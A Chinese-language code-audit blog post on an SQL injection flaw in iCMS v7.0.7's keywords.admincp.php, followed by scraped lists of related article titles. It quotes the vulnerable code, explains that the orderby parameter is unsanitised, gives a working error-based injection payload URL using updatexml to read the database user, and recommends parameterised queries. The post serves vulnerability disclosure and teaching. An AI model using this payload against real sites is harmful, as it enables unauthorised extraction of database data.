【代码审计】iCMS_v7.0.7 keywords.admincp.php页面存在SQL注入漏洞分析
0x00 环境准备
iCMS官网:https://www.icmsdev.com
网站源码版本:iCMS-v7.0.7
程序源码下载:https://www.icmsdev.com/download/release/iCMS7/latest
默认后台地址:http://127.0.0.1/admincp.php
默认账号密码:用户名密码自设
测试网站首页:
0x01 代码分析
1、漏洞文件位置:/app/keywords/keywords.admincp.php 第74-85行:
- public function do_iCMS(){
- if($_GET['keywords']) {
- $sql=" WHERE `keyword` REGEXP '{$_GET['keywords']}'";
- }
- $orderby =$_GET['orderby']?$_GET['orderby']:"id DESC";
- $maxperpage = $_GET['perpage']>0?(int)$_GET['perpage']:20;
- $total = iCMS::page_total_cache("SELECT count(*) FROM `#iCMS@__keywords` {$sql}","G");
- iUI::pagenav($total,$maxperpage,"个关键词");
- $rs = iDB::all("SELECT * FROM `#iCMS@__keywords` {$sql} order by {$orderby} LIMIT ".iUI::$offset." , {$maxperpage}");
- 10. $_count = count($rs);
- 11. include admincp::view("keywords.manage");
- 12. }
这段函数中将获取到的参数keywords、orderby、parpage,然后进行SQL语句拼接,其中keywords有单引号保护,parpage强制转换为数字类型,orderby参数未经任何处理,带入数据库执行,导致程序在实现上存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
0x02 漏洞利用
根据漏洞位置,构造出参数 Payload:
http://127.0.0.1/admincp.php?app=keywords&perpage=20&keywords=1111&orderby=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))--
0x03 修复建议
使用参数化查询可有效避免SQL注入
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
【代码审计】iCMS_v7.0.7 keywords.admincp.php页面存在SQL注入漏洞分析相关推荐
- 【代码审计】iCMS_v7.0.7 apps.admincp.php页面存在SQL注入漏洞分析
0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...
- 【代码审计】iCMS_v7.0.7 search.admincp.php页面存在SQL注入漏洞
0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...
- 【代码审计】iCMS_v7.0.7 admincp.app.php页面存在SQL注入漏洞分析
0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...
- 动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞
动易网站管理系统vote.asp页面存在SQL注入漏洞 测试系统: 动易(PowerEasy CMS SP6 071030以下版本) 安全综述: 动易网站管理系统是一个采用 ASP 和 MSSQL 等 ...
- php100漏洞,phpyun人才管理系统V5.0 SQL注入漏洞分析
*世界上最愚蠢的事莫过于我们无比狂热地做一件事,到最后却不知道为什么要做* cms背景介绍 PHP云人才管理系统(phpyun)是国内主流人才管理CMS系统之一!PHP云专为中文用户设计和开发,采用: ...
- TP5 框架 SQL 执行流程分析及 5.0.9 SQL 注入漏洞分析
文章目录 SQL查询流程 TP 5.0.9 SQL注入 修复 SQL查询流程 TP5手册:https://www.kancloud.cn/manual/thinkphp5/118044 在分析 tp5 ...
- 迅雷某页面存在sql注入漏洞
漏洞详情 披露状态: 2010-07-21: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...
- php7 魔术引号,php代码审计魔术引号带来的注入问题浅析之Discuz_7.x faq.php SQL注入漏洞...
首先根据存在的目的可以理解处理机制: 当打开时所有的'单引号."双引号.\反斜线.NULL字符都被自动加上一个反斜线进行转义: 1)得到原字符的场景举例(',\,",null) $ ...
- 动网 php v1.0 漏洞,动网论坛dispuser.php页面SQL注入漏洞
受影响系统: 动网论坛 Dvbbs php 2.0++ 描述: DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序. 在DVBBS的dispuser.php文件中: if( ...
最新文章
- 常用 Git 命令清单
- python 非线性回归_机器学习入门之菜鸟之路——机器学习之非线性回归个人理解及python实现...
- Shell中的Wget 的用法
- 因主机名更改造成oracle控制台登录错误:ora-12545,ora-12541
- Divide and conquer:K Best(POJ 3111)
- Happy Necklace dp 递推 矩阵快速幂
- OpenGL创建一个GLFW窗口的实例
- MongoDB 与传统数据库的对比
- DB First .edmx
- Windows令牌窃取提权和烂土豆提权学习
- SQL Server(express)安装教程
- 截图神器-snipaste
- 论网站按钮的设计艺术与生命周期
- 【Java分享客栈】我有一个朋友,和前端工程师联调接口被狠狠鄙视了一番。
- 《鲲鹏》MV,160万开发者的集结号
- 学习笔记——PA的stability问题
- This Week in Spring - January 14th, 2020
- 计算机信息技术专业毕业鉴定,信息技术毕业鉴定自我鉴定.doc
- Python 中的lower()、upper()函数和str\chr
- 探索编译软件栈新范式;高端GPU禁售的影响;陈天奇DL系统免费课程|AI系统前沿动态
热门文章
- WPF Visifire使用
- 从苏宁电器到卡巴斯基(第二部)第03篇:我在卡巴的日子 III
- Windows下 开机自启动jar包
- 仿百度网盘html页面源码,仿百度云主界面
- scrapy组件、中间件、spider中类方法from_crawler的作用
- 计算机网络中帧和字节的关系,关于“帧frame”、“比特bite”、“字节byte”
- Android英文名词
- 搭建一个Spring框架
- 如何估算文章阅读时长? 1
- 小米申请注册多个 “铁蛋”商标